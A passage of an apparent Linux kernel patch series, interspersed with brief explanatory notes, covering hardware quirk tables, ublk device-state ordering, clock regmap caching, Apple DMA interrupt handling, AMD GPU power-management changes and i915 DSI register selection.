+ 		ret = -EKEYREJECTED;
+ 	} else {
+ 		pr_debug("The digests match!\n");
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index a222bda7e15b0..d08818baea88f 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -400,6 +400,13 @@ static const struct dmi_system_id medion_laptop[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "M17T"),
+ 		},
+ 	},
++	{
++		.ident = "MEDION S17413",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "MEDION"),
++			DMI_MATCH(DMI_BOARD_NAME, "M1xA"),
++		},
++	},
+ 	{ }
+ };
+ 
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index b3b0b06971df5..e85729fc481fd 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -532,6 +532,14 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "Precision 7510"),
+ 		},
+ 	},
++	{
++	 .callback = video_detect_force_native,
++	 /* Acer Aspire 3830TG */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Acer"),
++		DMI_MATCH(DMI_PRODUCT_NAME, "Aspire 3830TG"),
++		},
++	},
+ 	{
+ 	 .callback = video_detect_force_native,
+ 	 /* Acer Aspire 4810T */
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index 2ed994a313a91..c0cbc5f3eb266 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -1571,17 +1571,18 @@ static int ublk_ctrl_start_dev(struct io_uring_cmd *cmd)
+ 		set_bit(GD_SUPPRESS_PART_SCAN, &disk->state);
+ 
+ 	get_device(&ub->cdev_dev);
++	ub->dev_info.state = UBLK_S_DEV_LIVE;
+ 	ret = add_disk(disk);
+ 	if (ret) {
+ 		/*
+ 		 * Has to drop the reference since ->free_disk won't be
+ 		 * called in case of add_disk failure.
+ 		 */
++		ub->dev_info.state = UBLK_S_DEV_DEAD;
+ 		ublk_put_device(ub);
+ 		goto out_put_disk;
+ 	}
+ 	set_bit(UB_STATE_USED, &ub->state);
+-	ub->dev_info.state = UBLK_S_DEV_LIVE;
+ out_put_disk:
+ 	if (ret)
+ 		put_disk(disk);
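The ublk reordering matters because add_disk() can start serving I/O before it returns, so the device state has to read UBLK_S_DEV_LIVE by then; the error path then rolls the state back before dropping the reference. A sketch of the resulting ordering, names from the hunk:

	ub->dev_info.state = UBLK_S_DEV_LIVE;		/* must be LIVE before add_disk() */
	ret = add_disk(disk);
	if (ret) {
		ub->dev_info.state = UBLK_S_DEV_DEAD;	/* roll back on failure */
		ublk_put_device(ub);	/* ->free_disk won't run, drop the ref manually */
	}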
+diff --git a/drivers/bluetooth/btbcm.c b/drivers/bluetooth/btbcm.c
+index 3006e2a0f37e1..43e98a598bd9a 100644
+--- a/drivers/bluetooth/btbcm.c
++++ b/drivers/bluetooth/btbcm.c
+@@ -511,7 +511,7 @@ static const char *btbcm_get_board_name(struct device *dev)
+ 	len = strlen(tmp) + 1;
+ 	board_type = devm_kzalloc(dev, len, GFP_KERNEL);
+ 	strscpy(board_type, tmp, len);
+-	for (i = 0; i < board_type[i]; i++) {
++	for (i = 0; i < len; i++) {
+ 		if (board_type[i] == '/')
+ 			board_type[i] = '-';
+ 	}
+diff --git a/drivers/clk/clk-renesas-pcie.c b/drivers/clk/clk-renesas-pcie.c
+index e6247141d0c05..3e98a16eba6bb 100644
+--- a/drivers/clk/clk-renesas-pcie.c
++++ b/drivers/clk/clk-renesas-pcie.c
+@@ -144,8 +144,9 @@ static int rs9_regmap_i2c_read(void *context,
+ static const struct regmap_config rs9_regmap_config = {
+ 	.reg_bits = 8,
+ 	.val_bits = 8,
+-	.cache_type = REGCACHE_NONE,
++	.cache_type = REGCACHE_FLAT,
+ 	.max_register = RS9_REG_BCP,
++	.num_reg_defaults_raw = 0x8,
+ 	.rd_table = &rs9_readable_table,
+ 	.wr_table = &rs9_writeable_table,
+ 	.reg_write = rs9_regmap_i2c_write,
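Moving the 9-series clock generator from REGCACHE_NONE to REGCACHE_FLAT lets regmap answer reads from a flat in-memory array instead of a round trip on the I2C bus; num_reg_defaults_raw gives the core a raw register count to work with when populating that cache. A sketch of the shape of such a config (only the RS9_* names are from the hunk; the rest is illustrative):

	static const struct regmap_config example_flat_config = {
		.reg_bits		= 8,
		.val_bits		= 8,
		.cache_type		= REGCACHE_FLAT,	/* one slot per register */
		.max_register		= RS9_REG_BCP,
		.num_reg_defaults_raw	= 0x8,
		.rd_table		= &rs9_readable_table,
		.wr_table		= &rs9_writeable_table,
	};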
+diff --git a/drivers/clk/sprd/common.c b/drivers/clk/sprd/common.c
+index ce81e4087a8fc..2bfbab8db94bf 100644
+--- a/drivers/clk/sprd/common.c
++++ b/drivers/clk/sprd/common.c
+@@ -17,7 +17,6 @@ static const struct regmap_config sprdclk_regmap_config = {
+ 	.reg_bits	= 32,
+ 	.reg_stride	= 4,
+ 	.val_bits	= 32,
+-	.max_register	= 0xffff,
+ 	.fast_io	= true,
+ };
+ 
+@@ -43,6 +42,8 @@ int sprd_clk_regmap_init(struct platform_device *pdev,
+ 	struct device *dev = &pdev->dev;
+ 	struct device_node *node = dev->of_node, *np;
+ 	struct regmap *regmap;
++	struct resource *res;
++	struct regmap_config reg_config = sprdclk_regmap_config;
+ 
+ 	if (of_find_property(node, "sprd,syscon", NULL)) {
+ 		regmap = syscon_regmap_lookup_by_phandle(node, "sprd,syscon");
+@@ -59,12 +60,14 @@ int sprd_clk_regmap_init(struct platform_device *pdev,
+ 			return PTR_ERR(regmap);
+ 		}
+ 	} else {
+-		base = devm_platform_ioremap_resource(pdev, 0);
++		base = devm_platform_get_and_ioremap_resource(pdev, 0, &res);
+ 		if (IS_ERR(base))
+ 			return PTR_ERR(base);
+ 
++		reg_config.max_register = resource_size(res) - reg_config.reg_stride;
++
+ 		regmap = devm_regmap_init_mmio(&pdev->dev, base,
+-					       &sprdclk_regmap_config);
++					       &reg_config);
+ 		if (IS_ERR(regmap)) {
+ 			pr_err("failed to init regmap\n");
+ 			return PTR_ERR(regmap);
+diff --git a/drivers/dma/apple-admac.c b/drivers/dma/apple-admac.c
+index 90f28bda29c8b..4cf8da77bdd91 100644
+--- a/drivers/dma/apple-admac.c
++++ b/drivers/dma/apple-admac.c
+@@ -75,6 +75,7 @@
+ 
+ #define REG_TX_INTSTATE(idx)		(0x0030 + (idx) * 4)
+ #define REG_RX_INTSTATE(idx)		(0x0040 + (idx) * 4)
++#define REG_GLOBAL_INTSTATE(idx)	(0x0050 + (idx) * 4)
+ #define REG_CHAN_INTSTATUS(ch, idx)	(0x8010 + (ch) * 0x200 + (idx) * 4)
+ #define REG_CHAN_INTMASK(ch, idx)	(0x8020 + (ch) * 0x200 + (idx) * 4)
+ 
+@@ -511,7 +512,10 @@ static int admac_terminate_all(struct dma_chan *chan)
+ 	admac_stop_chan(adchan);
+ 	admac_reset_rings(adchan);
+ 
+-	adchan->current_tx = NULL;
++	if (adchan->current_tx) {
++		list_add_tail(&adchan->current_tx->node, &adchan->to_free);
++		adchan->current_tx = NULL;
++	}
+ 	/*
+ 	 * Descriptors can only be freed after the tasklet
+ 	 * has been killed (in admac_synchronize).
+@@ -672,13 +676,14 @@ static void admac_handle_chan_int(struct admac_data *ad, int no)
+ static irqreturn_t admac_interrupt(int irq, void *devid)
+ {
+ 	struct admac_data *ad = devid;
+-	u32 rx_intstate, tx_intstate;
++	u32 rx_intstate, tx_intstate, global_intstate;
+ 	int i;
+ 
+ 	rx_intstate = readl_relaxed(ad->base + REG_RX_INTSTATE(ad->irq_index));
+ 	tx_intstate = readl_relaxed(ad->base + REG_TX_INTSTATE(ad->irq_index));
++	global_intstate = readl_relaxed(ad->base + REG_GLOBAL_INTSTATE(ad->irq_index));
+ 
+-	if (!tx_intstate && !rx_intstate)
++	if (!tx_intstate && !rx_intstate && !global_intstate)
+ 		return IRQ_NONE;
+ 
+ 	for (i = 0; i < ad->nchannels; i += 2) {
+@@ -693,6 +698,12 @@ static irqreturn_t admac_interrupt(int irq, void *devid)
+ 		rx_intstate >>= 1;
+ 	}
+ 
++	if (global_intstate) {
++		dev_warn(ad->dev, "clearing unknown global interrupt flag: %x\n",
++			 global_intstate);
++		writel_relaxed(~(u32) 0, ad->base + REG_GLOBAL_INTSTATE(ad->irq_index));
++	}
++
+ 	return IRQ_HANDLED;
+ }
+ 
+@@ -850,6 +861,9 @@ static int admac_probe(struct platform_device *pdev)
+ 
+ 	dma->directions = BIT(DMA_MEM_TO_DEV) | BIT(DMA_DEV_TO_MEM);
+ 	dma->residue_granularity = DMA_RESIDUE_GRANULARITY_BURST;
++	dma->src_addr_widths = BIT(DMA_SLAVE_BUSWIDTH_1_BYTE) |
++			BIT(DMA_SLAVE_BUSWIDTH_2_BYTES) |
++			BIT(DMA_SLAVE_BUSWIDTH_4_BYTES);
+ 	dma->dst_addr_widths = BIT(DMA_SLAVE_BUSWIDTH_1_BYTE) |
+ 			BIT(DMA_SLAVE_BUSWIDTH_2_BYTES) |
+ 			BIT(DMA_SLAVE_BUSWIDTH_4_BYTES);
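One behavioral note on the admac terminate path: a terminated in-flight descriptor is now parked on the to_free list rather than having its pointer dropped, because (per the comment in the hunk) descriptors may only be freed once the tasklet has been killed in admac_synchronize(); dropping the pointer leaked it. Sketch:

	if (adchan->current_tx) {
		/* defer freeing until admac_synchronize() kills the tasklet */
		list_add_tail(&adchan->current_tx->node, &adchan->to_free);
		adchan->current_tx = NULL;
	}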
+diff --git a/drivers/firmware/efi/sysfb_efi.c b/drivers/firmware/efi/sysfb_efi.c
+index e76d6803bdd08..456d0e5eaf78b 100644
+--- a/drivers/firmware/efi/sysfb_efi.c
++++ b/drivers/firmware/efi/sysfb_efi.c
+@@ -272,6 +272,14 @@ static const struct dmi_system_id efifb_dmi_swap_width_height[] __initconst = {
+ 					"IdeaPad Duet 3 10IGL5"),
+ 		},
+ 	},
++	{
++		/* Lenovo Yoga Book X91F / X91L */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++			/* Non-exact match to match F + L versions */
++			DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X91"),
++		},
++	},
+ 	{},
+ };
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
+index faff4a3f96e6e..f52d0ba91a770 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
+@@ -678,6 +678,15 @@ void amdgpu_fence_driver_clear_job_fences(struct amdgpu_ring *ring)
+ 		ptr = &ring->fence_drv.fences[i];
+ 		old = rcu_dereference_protected(*ptr, 1);
+ 		if (old && old->ops == &amdgpu_job_fence_ops) {
++			struct amdgpu_job *job;
++
++			/* For a non-scheduler bad job, i.e. a failed ib test, signal
++			 * it right here or we won't be able to track it in fence_drv
++			 * and it will remain unsignaled during sa_bo free.
++			 */
++			job = container_of(old, struct amdgpu_job, hw_fence);
++			if (!job->base.s_fence && !dma_fence_is_signaled(old))
++				dma_fence_signal(old);
+ 			RCU_INIT_POINTER(*ptr, NULL);
+ 			dma_fence_put(old);
+ 		}
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+index 66eb102cd88fb..ddb7b8651ab4c 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+@@ -1315,6 +1315,11 @@ static int gfx_v11_0_sw_init(void *handle)
+ 		break;
+ 	}
+ 
++	/* Enable CG flag in one VF mode for enabling RLC safe mode enter/exit */
++	if (adev->ip_versions[GC_HWIP][0] == IP_VERSION(11, 0, 3) &&
++		amdgpu_sriov_is_pp_one_vf(adev))
++		adev->cg_flags = AMD_CG_SUPPORT_GFX_CGCG;
++
+ 	/* EOP Event */
+ 	r = amdgpu_irq_add_id(adev, SOC21_IH_CLIENTID_GRBM_CP,
+ 			      GFX_11_0_0__SRCID__CP_EOP_INTERRUPT,
+@@ -4625,6 +4630,14 @@ static bool gfx_v11_0_check_soft_reset(void *handle)
+ 	return false;
+ }
+ 
++static int gfx_v11_0_post_soft_reset(void *handle)
++{
++	/*
++	 * GFX soft reset also impacts MES; resume MES after a GFX soft reset.
++	 */
++	return amdgpu_mes_resume((struct amdgpu_device *)handle);
++}
++
+ static uint64_t gfx_v11_0_get_gpu_clock_counter(struct amdgpu_device *adev)
+ {
+ 	uint64_t clock;
+@@ -6096,6 +6109,7 @@ static const struct amd_ip_funcs gfx_v11_0_ip_funcs = {
+ 	.wait_for_idle = gfx_v11_0_wait_for_idle,
+ 	.soft_reset = gfx_v11_0_soft_reset,
+ 	.check_soft_reset = gfx_v11_0_check_soft_reset,
++	.post_soft_reset = gfx_v11_0_post_soft_reset,
+ 	.set_clockgating_state = gfx_v11_0_set_clockgating_state,
+ 	.set_powergating_state = gfx_v11_0_set_powergating_state,
+ 	.get_clockgating_state = gfx_v11_0_get_clockgating_state,
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+index 657e7c7b59e98..43be27c8d2ff3 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+@@ -175,6 +175,40 @@ void dm_helpers_dp_update_branch_info(
+ 	const struct dc_link *link)
+ {}
+ 
++static void dm_helpers_construct_old_payload(
++			struct dc_link *link,
++			int pbn_per_slot,
++			struct drm_dp_mst_atomic_payload *new_payload,
++			struct drm_dp_mst_atomic_payload *old_payload)
++{
++	struct link_mst_stream_allocation_table current_link_table =
++									link->mst_stream_alloc_table;
++	struct link_mst_stream_allocation *dc_alloc;
++	int i;
++
++	*old_payload = *new_payload;
++
++	/* Set the correct time_slots/PBN of the old payload.
++	 * The other fields (delete & dsc_enabled) in
++	 * struct drm_dp_mst_atomic_payload are don't-care fields
++	 * when calling drm_dp_remove_payload().
++	 */
++	for (i = 0; i < current_link_table.stream_count; i++) {
++		dc_alloc =
++			&current_link_table.stream_allocations[i];
++
++		if (dc_alloc->vcp_id == new_payload->vcpi) {
++			old_payload->time_slots = dc_alloc->slot_count;
++			old_payload->pbn = dc_alloc->slot_count * pbn_per_slot;
++			break;
++		}
++	}
++
++	/* Make sure there is an old payload */
++	ASSERT(i != current_link_table.stream_count);
++
++}
++
+ /*
+  * Writes payload allocation table in immediate downstream device.
+  */
+@@ -186,7 +220,7 @@ bool dm_helpers_dp_mst_write_payload_allocation_table(
+ {
+ 	struct amdgpu_dm_connector *aconnector;
+ 	struct drm_dp_mst_topology_state *mst_state;
+-	struct drm_dp_mst_atomic_payload *payload;
++	struct drm_dp_mst_atomic_payload *target_payload, *new_payload, old_payload;
+ 	struct drm_dp_mst_topology_mgr *mst_mgr;
+ 
+ 	aconnector = (struct amdgpu_dm_connector *)stream->dm_stream_context;
+@@ -202,17 +236,26 @@ bool dm_helpers_dp_mst_write_payload_allocation_table(
+ 	mst_state = to_drm_dp_mst_topology_state(mst_mgr->base.state);
+ 
+ 	/* It's OK for this to fail */
+-	payload = drm_atomic_get_mst_payload_state(mst_state, aconnector->port);
+-	if (enable)
+-		drm_dp_add_payload_part1(mst_mgr, mst_state, payload);
+-	else
+-		drm_dp_remove_payload(mst_mgr, mst_state, payload, payload);
++	new_payload = drm_atomic_get_mst_payload_state(mst_state, aconnector->port);
++
++	if (enable) {
++		target_payload = new_payload;
++
++		drm_dp_add_payload_part1(mst_mgr, mst_state, new_payload);
++	} else {
++		/* Construct the old payload from its VCPI */
++		dm_helpers_construct_old_payload(stream->link, mst_state->pbn_div,
++						new_payload, &old_payload);
++		target_payload = &old_payload;
++
++		drm_dp_remove_payload(mst_mgr, mst_state, &old_payload, new_payload);
++	}
+ 
+ 	/* mst_mgr->->payloads are VC payload notify MST branch using DPCD or
+ 	 * AUX message. The sequence is slot 1-63 allocated sequence for each
+ 	 * stream. AMD ASIC stream slot allocation should follow the same
+ 	 * sequence. copy DRM MST allocation to dc */
+-	fill_dc_mst_payload_table_from_drm(stream->link, enable, payload, proposed_table);
++	fill_dc_mst_payload_table_from_drm(stream->link, enable, target_payload, proposed_table);
+ 
+ 	return true;
+ }
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+index bffa6247c3cda..6121005390db4 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+@@ -61,6 +61,12 @@
+ #define CTF_OFFSET_HOTSPOT		5
+ #define CTF_OFFSET_MEM			5
+ 
++static const int pmfw_decoded_link_speed[5] = {1, 2, 3, 4, 5};
++static const int pmfw_decoded_link_width[7] = {0, 1, 2, 4, 8, 12, 16};
++
++#define DECODE_GEN_SPEED(gen_speed_idx)		(pmfw_decoded_link_speed[gen_speed_idx])
++#define DECODE_LANE_WIDTH(lane_width_idx)	(pmfw_decoded_link_width[lane_width_idx])
++
+ struct smu_13_0_max_sustainable_clocks {
+ 	uint32_t display_clock;
+ 	uint32_t phy_clock;
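The two lookup tables exist because PMFW reports PCIe speed and width as small indices rather than literal values; the DECODE_* macros translate an index into the actual generation number and lane count. A quick worked example against the tables above:

	int gen   = DECODE_GEN_SPEED(3);	/* pmfw_decoded_link_speed[3] -> 4, PCIe Gen4   */
	int width = DECODE_LANE_WIDTH(6);	/* pmfw_decoded_link_width[6] -> 16, an x16 link */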
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+index 508e392547d7a..9431f2cb37776 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+@@ -1125,8 +1125,8 @@ static int smu_v13_0_0_print_clk_levels(struct smu_context *smu,
+ 					(pcie_table->pcie_lane[i] == 5) ? "x12" :
+ 					(pcie_table->pcie_lane[i] == 6) ? "x16" : "",
+ 					pcie_table->clk_freq[i],
+-					((gen_speed - 1) == pcie_table->pcie_gen[i]) &&
+-					(lane_width == link_width[pcie_table->pcie_lane[i]]) ?
++					(gen_speed == DECODE_GEN_SPEED(pcie_table->pcie_gen[i])) &&
++					(lane_width == DECODE_LANE_WIDTH(link_width[pcie_table->pcie_lane[i]])) ?
+ 					"*" : "");
+ 		break;
+ 
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+index 9e1967d8049e3..4399416dd9b8f 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+@@ -575,6 +575,14 @@ static int smu_v13_0_7_set_default_dpm_table(struct smu_context *smu)
+ 						     dpm_table);
+ 		if (ret)
+ 			return ret;
++
++		if (skutable->DriverReportedClocks.GameClockAc &&
++			(dpm_table->dpm_levels[dpm_table->count - 1].value >
++			skutable->DriverReportedClocks.GameClockAc)) {
++			dpm_table->dpm_levels[dpm_table->count - 1].value =
++				skutable->DriverReportedClocks.GameClockAc;
++			dpm_table->max = skutable->DriverReportedClocks.GameClockAc;
++		}
+ 	} else {
+ 		dpm_table->count = 1;
+ 		dpm_table->dpm_levels[0].value = smu->smu_table.boot_values.gfxclk / 100;
+@@ -828,6 +836,57 @@ static int smu_v13_0_7_get_smu_metrics_data(struct smu_context *smu,
+ 	return ret;
+ }
+ 
++static int smu_v13_0_7_get_dpm_ultimate_freq(struct smu_context *smu,
++					     enum smu_clk_type clk_type,
++					     uint32_t *min,
++					     uint32_t *max)
++{
++	struct smu_13_0_dpm_context *dpm_context =
++		smu->smu_dpm.dpm_context;
++	struct smu_13_0_dpm_table *dpm_table;
++
++	switch (clk_type) {
++	case SMU_MCLK:
++	case SMU_UCLK:
++		/* uclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.uclk_table;
++		break;
++	case SMU_GFXCLK:
++	case SMU_SCLK:
++		/* gfxclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.gfx_table;
++		break;
++	case SMU_SOCCLK:
++		/* socclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.soc_table;
++		break;
++	case SMU_FCLK:
++		/* fclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.fclk_table;
++		break;
++	case SMU_VCLK:
++	case SMU_VCLK1:
++		/* vclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.vclk_table;
++		break;
++	case SMU_DCLK:
++	case SMU_DCLK1:
++		/* dclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.dclk_table;
++		break;
++	default:
++		dev_err(smu->adev->dev, "Unsupported clock type!\n");
++		return -EINVAL;
++	}
++
++	if (min)
++		*min = dpm_table->min;
++	if (max)
++		*max = dpm_table->max;
++
++	return 0;
++}
++
+ static int smu_v13_0_7_read_sensor(struct smu_context *smu,
+ 				   enum amd_pp_sensors sensor,
+ 				   void *data,
+@@ -1074,8 +1133,8 @@ static int smu_v13_0_7_print_clk_levels(struct smu_context *smu,
+ 					(pcie_table->pcie_lane[i] == 5) ? "x12" :
+ 					(pcie_table->pcie_lane[i] == 6) ? "x16" : "",
+ 					pcie_table->clk_freq[i],
+-					(gen_speed == pcie_table->pcie_gen[i]) &&
+-					(lane_width == pcie_table->pcie_lane[i]) ?
++					(gen_speed == DECODE_GEN_SPEED(pcie_table->pcie_gen[i])) &&
++					(lane_width == DECODE_LANE_WIDTH(pcie_table->pcie_lane[i])) ?
+ 					"*" : "");
+ 		break;
+ 
+@@ -1329,9 +1388,17 @@ static int smu_v13_0_7_populate_umd_state_clk(struct smu_context *smu)
+ 				&dpm_context->dpm_tables.fclk_table;
+ 	struct smu_umd_pstate_table *pstate_table =
+ 				&smu->pstate_table;
++	struct smu_table_context *table_context = &smu->smu_table;
++	PPTable_t *pptable = table_context->driver_pptable;
++	DriverReportedClocks_t driver_clocks =
++		pptable->SkuTable.DriverReportedClocks;
+ 
+ 	pstate_table->gfxclk_pstate.min = gfx_table->min;
+-	pstate_table->gfxclk_pstate.peak = gfx_table->max;
++	if (driver_clocks.GameClockAc &&
++		(driver_clocks.GameClockAc < gfx_table->max))
++		pstate_table->gfxclk_pstate.peak = driver_clocks.GameClockAc;
++	else
++		pstate_table->gfxclk_pstate.peak = gfx_table->max;
+ 
+ 	pstate_table->uclk_pstate.min = mem_table->min;
+ 	pstate_table->uclk_pstate.peak = mem_table->max;
+@@ -1348,12 +1415,12 @@ static int smu_v13_0_7_populate_umd_state_clk(struct smu_context *smu)
+ 	pstate_table->fclk_pstate.min = fclk_table->min;
+ 	pstate_table->fclk_pstate.peak = fclk_table->max;
+ 
+-	/*
+-	 * For now, just use the mininum clock frequency.
+-	 * TODO: update them when the real pstate settings available
+-	 */
+-	pstate_table->gfxclk_pstate.standard = gfx_table->min;
+-	pstate_table->uclk_pstate.standard = mem_table->min;
++	if (driver_clocks.BaseClockAc &&
++		driver_clocks.BaseClockAc < gfx_table->max)
++		pstate_table->gfxclk_pstate.standard = driver_clocks.BaseClockAc;
++	else
++		pstate_table->gfxclk_pstate.standard = gfx_table->max;
++	pstate_table->uclk_pstate.standard = mem_table->max;
+ 	pstate_table->socclk_pstate.standard = soc_table->min;
+ 	pstate_table->vclk_pstate.standard = vclk_table->min;
+ 	pstate_table->dclk_pstate.standard = dclk_table->min;
+@@ -1676,7 +1743,7 @@ static const struct pptable_funcs smu_v13_0_7_ppt_funcs = {
+ 	.dpm_set_jpeg_enable = smu_v13_0_set_jpeg_enable,
+ 	.init_pptable_microcode = smu_v13_0_init_pptable_microcode,
+ 	.populate_umd_state_clk = smu_v13_0_7_populate_umd_state_clk,
+-	.get_dpm_ultimate_freq = smu_v13_0_get_dpm_ultimate_freq,
++	.get_dpm_ultimate_freq = smu_v13_0_7_get_dpm_ultimate_freq,
+ 	.get_vbios_bootup_values = smu_v13_0_get_vbios_bootup_values,
+ 	.read_sensor = smu_v13_0_7_read_sensor,
+ 	.feature_is_enabled = smu_cmn_feature_is_enabled,
+diff --git a/drivers/gpu/drm/armada/armada_drv.c b/drivers/gpu/drm/armada/armada_drv.c
+index 0643887800b4d..142668cd6d7cd 100644
+--- a/drivers/gpu/drm/armada/armada_drv.c
++++ b/drivers/gpu/drm/armada/armada_drv.c
+@@ -99,7 +99,6 @@ static int armada_drm_bind(struct device *dev)
+ 	if (ret) {
+ 		dev_err(dev, "[" DRM_NAME ":%s] can't kick out simple-fb: %d\n",
+ 			__func__, ret);
+-		kfree(priv);
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index 5522d610c5cfd..b1a38e6ce2f8f 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -328,10 +328,17 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "IdeaPad Duet 3 10IGL5"),
+ 		},
+ 		.driver_data = (void *)&lcd1200x1920_rightside_up,
+-	}, {	/* Lenovo Yoga Book X90F / X91F / X91L */
++	}, {	/* Lenovo Yoga Book X90F / X90L */
+ 		.matches = {
+-		  /* Non exact match to match all versions */
+-		  DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X9"),
++		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "YETI-11"),
++		},
++		.driver_data = (void *)&lcd1200x1920_rightside_up,
++	}, {	/* Lenovo Yoga Book X91F / X91L */
++		.matches = {
++		  /* Non-exact match to match F + L versions */
++		  DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X91"),
+ 		},
+ 		.driver_data = (void *)&lcd1200x1920_rightside_up,
+ 	}, {	/* Lenovo Yoga Tablet 2 830F / 830L */
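Both the efifb and panel-orientation tables above lean on the same DMI semantics: DMI_MATCH is a substring match while DMI_EXACT_MATCH requires full equality, so one deliberately loose pattern can still cover two products. Roughly:

	/* Substring match: covers both "Lenovo YB1-X91F" and
	 * "Lenovo YB1-X91L"; the X90 entry instead pins the board down
	 * with three DMI_EXACT_MATCH fields.
	 */
	DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X91"),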
+diff --git a/drivers/gpu/drm/i915/display/icl_dsi.c b/drivers/gpu/drm/i915/display/icl_dsi.c
+index cf5d2f8885f08..c62bb9e2c1743 100644
+--- a/drivers/gpu/drm/i915/display/icl_dsi.c
++++ b/drivers/gpu/drm/i915/display/icl_dsi.c
+@@ -300,9 +300,21 @@ static void configure_dual_link_mode(struct intel_encoder *encoder,
+ {
+ 	struct drm_i915_private *dev_priv = to_i915(encoder->base.dev);
+ 	struct intel_dsi *intel_dsi = enc_to_intel_dsi(encoder);
++	i915_reg_t dss_ctl1_reg, dss_ctl2_reg;
+ 	u32 dss_ctl1;
+ 
+-	dss_ctl1 = intel_de_read(dev_priv, DSS_CTL1);
++	/* FIXME: Move all DSS handling to intel_vdsc.c */
++	if (DISPLAY_VER(dev_priv) >= 12) {
++		struct intel_crtc *crtc = to_intel_crtc(pipe_config->uapi.crtc);
++
++		dss_ctl1_reg = ICL_PIPE_DSS_CTL1(crtc->pipe);
++		dss_ctl2_reg = ICL_PIPE_DSS_CTL2(crtc->pipe);
++	} else {
++		dss_ctl1_reg = DSS_CTL1;
++		dss_ctl2_reg = DSS_CTL2;
++	}
++
++	dss_ctl1 = intel_de_read(dev_priv, dss_ctl1_reg);
+ 	dss_ctl1 |= SPLITTER_ENABLE;
+ 	dss_ctl1 &= ~OVERLAP_PIXELS_MASK;
+ 	dss_ctl1 |= OVERLAP_PIXELS(intel_dsi->pixel_overlap);
+@@ -323,16 +335,16 @@ static void configure_dual_link_mode(struct intel_encoder *encoder,
+ 
+ 		dss_ctl1 &= ~LEFT_DL_BUF_TARGET_DEPTH_MASK;
+ 		dss_ctl1 |= LEFT_DL_BUF_TARGET_DEPTH(dl_buffer_depth);
+-		dss_ctl2 = intel_de_read(dev_priv, DSS_CTL2);
++		dss_ctl2 = intel_de_read(dev_priv, dss_ctl2_reg);
+ 		dss_ctl2 &= ~RIGHT_DL_BUF_TARGET_DEPTH_MASK;
+ 		dss_ctl2 |= RIGHT_DL_BUF_TARGET_DEPTH(dl_buffer_depth);
+-		intel_de_write(dev_priv, DSS_CTL2, dss_ctl2);
++		intel_de_write(dev_priv, dss_ctl2_reg, dss_ctl2);
+ 	} else {
+ 		/* Interleave */
+ 		dss_ctl1 |= DUAL_LINK_MODE_INTERLEAVE;
+ 	}
+ 
+-	intel_de_write(dev_priv, DSS_CTL1, dss_ctl1);
++	intel_de_write(dev_priv, dss_ctl1_reg, dss_ctl1);
+ }
+ 
+ /* aka DSI 8X clock */
